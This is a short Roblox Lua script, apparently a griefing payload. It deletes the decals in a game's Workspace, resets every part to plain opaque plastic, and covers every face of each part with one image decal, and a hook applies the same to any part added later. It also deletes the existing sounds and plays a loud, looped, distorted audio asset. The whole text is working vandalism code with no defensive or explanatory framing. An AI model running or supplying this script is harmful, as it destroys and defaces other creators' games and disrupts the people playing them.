local ID = "rbxassetid://134964081588127" local function spamDecals(root) for _, v in pairs(root:GetChildren()) do if v:IsA("Decal") and v.Texture ~= ID then v:Destroy() elseif v:IsA("BasePart") then v.Material = Enum.Material.Plastic v.Transparency = 0 local faces = {"Front","Back","Right","Left","Top","Bottom"} for _, f in ipairs(faces) do local d = Instance.new("Decal") d.Texture = ID d.Face = Enum.NormalId[f] d.Parent = v end end spamDecals(v) end end spamDecals(game.Workspace) game.DescendantAdded:Connect(function(obj) if obj:IsA("BasePart") then spamDecals(obj) end end) for i,v in pairs(game.Workspace:GetChildren()) do if v.className == "Sound" then v:Stop() v:Remove() end end s = Instance.new("Sound",Workspace) s.SoundId = "rbxassetid://87663330165612" s.Volume = 96 s.Looped = true s.Pitch = 0.1 s:Play() wait(.1) s:Play()